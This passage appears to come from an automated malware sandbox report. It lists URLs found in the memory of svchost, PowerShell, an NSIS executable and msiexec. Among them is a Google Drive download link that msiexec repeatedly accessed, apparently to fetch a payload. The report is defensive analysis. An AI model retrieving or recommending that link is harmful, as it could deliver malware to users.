Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: svchost.exe, 00000003.00000002.2416637984.0000017F88200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
      Source: svchost.exe, 00000003.00000003.1205213974.0000017F88418000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
      Source: edb.log.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
      Source: edb.log.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
      Source: edb.log.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
      Source: svchost.exe, 00000003.00000003.1205213974.0000017F88418000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
      Source: svchost.exe, 00000003.00000003.1205213974.0000017F88418000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
      Source: svchost.exe, 00000003.00000003.1205213974.0000017F8844D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
      Source: edb.log.3.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
      Source: GyGE2VaBFL.exe, GyGE2VaBFL.exe.1.drString found in binary or memory: http://nsis.sf.net/NSIS_Error
      Source: GyGE2VaBFL.exe, GyGE2VaBFL.exe.1.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: powershell.exe, 00000001.00000002.1669114987.0000000005E9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000001.00000002.1666170853.0000000004F85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000001.00000002.1666170853.0000000004F85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
      Source: svchost.exe, 00000003.00000002.2415877697.0000017F82EAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/enumeration/Enumerate
      Source: powershell.exe, 00000001.00000002.1666170853.0000000004E31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000001.00000002.1666170853.0000000004F85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
      Source: powershell.exe, 00000001.00000002.1666170853.0000000004F85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000001.00000002.1666170853.0000000004E31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
      Source: powershell.exe, 00000001.00000002.1666170853.0000000004F85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
      Source: msiexec.exe, 0000000A.00000003.1942442210.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2034300080.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2230355519.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2230463189.0000000000B6D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2304198126.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2383990393.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2230463189.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2136395251.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1788007854.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2304464046.0000000000B6C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2167527111.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2414604219.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2304464046.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1756685959.0000000000B66000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1818594292.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1848304830.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1909807452.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2349609914.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1879994330.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2261119586.0000000000B6C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1973398417.0000000000B25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
      Source: powershell.exe, 00000001.00000002.1669114987.0000000005E9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000001.00000002.1669114987.0000000005E9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000001.00000002.1669114987.0000000005E9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: msiexec.exe, 0000000A.00000003.2200809082.0000000000B27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dhttps://drive.usercontent.google.com/download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=d
      Source: msiexec.exe, 0000000A.00000003.2003808510.0000000000B28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
      Source: msiexec.exe, 0000000A.00000002.2414604219.0000000000A9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=download
      Source: msiexec.exe, 0000000A.00000002.2414604219.0000000000B24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/U
      Source: msiexec.exe, 0000000A.00000002.2414604219.0000000000B24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/f
      Source: msiexec.exe, 0000000A.00000003.2349387502.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2383919487.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2200809082.0000000000B27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/rcontent.google.com/download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=do
      Source: msiexec.exe, 0000000A.00000003.2261119586.0000000000B24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/s
      Source: msiexec.exe, 0000000A.00000003.1973369262.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1942442210.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2034300080.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2230355519.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2304198126.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2136395251.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2167527111.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2414604219.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1818594292.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1848304830.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1909807452.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1879994330.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2414604219.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1973398417.0000000000B25000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2349387502.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2076406086.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2428406383.0000000021D30000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2414213807.000000000075A000.00000004.00000010.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2383919487.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2200809082.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2261119586.0000000000B24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27
      Source: msiexec.exe, 0000000A.00000003.2200809082.0000000000B27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27IE5OsArQ9wgoR27
      Source: msiexec.exe, 0000000A.00000003.2304198126.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2414604219.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2349387502.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2383919487.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2261119586.0000000000B24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27IE5OsArQ9wgoR277
      Source: msiexec.exe, 0000000A.00000003.1973369262.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1942442210.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2034300080.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2230355519.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2136395251.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2167527111.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1909807452.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1879994330.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1973398417.0000000000B25000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2349387502.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2383919487.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2200809082.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2034328553.0000000000B25000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2003808510.0000000000B28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27IE5OsArQ9wgoR27y
      Source: msiexec.exe, 0000000A.00000003.2230355519.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2136395251.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2167527111.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2076406086.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2200809082.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2261119586.0000000000B24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27ndows
      Source: msiexec.exe, 0000000A.00000003.1973369262.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1942442210.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2034300080.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2230355519.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2304198126.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2136395251.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1788007854.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2167527111.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2414604219.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1818594292.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1848304830.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1909807452.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1879994330.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1973398417.0000000000B25000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2349387502.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2076406086.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2383919487.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2200809082.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2261119586.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2034328553.0000000000B25000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2003808510.0000000000B28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
      Source: msiexec.exe, 0000000A.00000003.1973369262.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1942442210.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2034300080.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2230355519.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2304198126.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2136395251.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1788007854.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2167527111.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2414604219.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1818594292.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1848304830.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1909807452.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1879994330.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1973398417.0000000000B25000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2349387502.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2076406086.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2383919487.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2200809082.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2261119586.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2034328553.0000000000B25000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2003808510.0000000000B28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/do0
      Source: msiexec.exe, 0000000A.00000003.2003808510.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2414604219.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2261229044.0000000000B68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=download
      Source: msiexec.exe, 0000000A.00000002.2414604219.0000000000A9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=download#
      Source: msiexec.exe, 0000000A.00000003.2034300080.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2034328553.0000000000B25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=download(
      Source: msiexec.exe, 0000000A.00000002.2414604219.0000000000A9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=download1
      Source: msiexec.exe, 0000000A.00000003.2034300080.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2136395251.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2167527111.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2076406086.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2034328553.0000000000B25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=download9
      Source: msiexec.exe, 0000000A.00000002.2414604219.0000000000A9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=download?
      Source: msiexec.exe, 0000000A.00000003.1973369262.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2034300080.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1973398417.0000000000B25000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2034328553.0000000000B25000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2003808510.0000000000B28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=downloadU
      Source: msiexec.exe, 0000000A.00000002.2414604219.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2383919487.0000000000B24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=downloadi
      Source: msiexec.exe, 0000000A.00000003.1973369262.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1942442210.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2034300080.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2230355519.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2304198126.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2136395251.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1788007854.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2167527111.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2414604219.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1818594292.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1848304830.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1909807452.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1879994330.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1973398417.0000000000B25000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2349387502.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2076406086.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2383919487.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2200809082.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2261119586.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 
0000000A.00000003.2034328553.0000000000B25000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2003808510.0000000000B28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/k
      Source: svchost.exe, 00000003.00000003.1205213974.0000017F884C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr | String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
      Source: edb.log.3.dr | String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
      Source: edb.log.3.dr | String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
      Source: edb.log.3.dr | String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
      Source: svchost.exe, 00000003.00000003.1205213974.0000017F884C2000.00000004.00000800.00020000.00000000.sdmp, edb.log.3.dr | String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
      Source: powershell.exe, 00000001.00000002.1666170853.0000000004F85000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000001.00000002.1669114987.0000000005E9C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
      Source: svchost.exe, 00000003.00000003.1205213974.0000017F884C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr | String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
      Source: edb.log.3.dr | String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
      Source: msiexec.exe, 0000000A.00000003.1942442210.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2034300080.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2230355519.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2230463189.0000000000B6D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2304198126.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2383990393.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2230463189.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2136395251.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1788007854.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2304464046.0000000000B6C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2167527111.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2414604219.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2304464046.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1756685959.0000000000B66000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1818594292.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1848304830.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1909807452.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2349609914.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1879994330.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2261119586.0000000000B6C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1973398417.0000000000B25000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ssl.gstatic.com
      Source: msiexec.exe, 0000000A.00000003.1942442210.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2034300080.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2230355519.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2230463189.0000000000B6D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2304198126.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2383990393.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2230463189.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2136395251.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1788007854.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2304464046.0000000000B6C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2167527111.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2414604219.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2304464046.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1756685959.0000000000B66000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1818594292.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1848304830.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1909807452.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2349609914.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1879994330.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2261119586.0000000000B6C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1973398417.0000000000B25000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google-analytics.com;report-uri
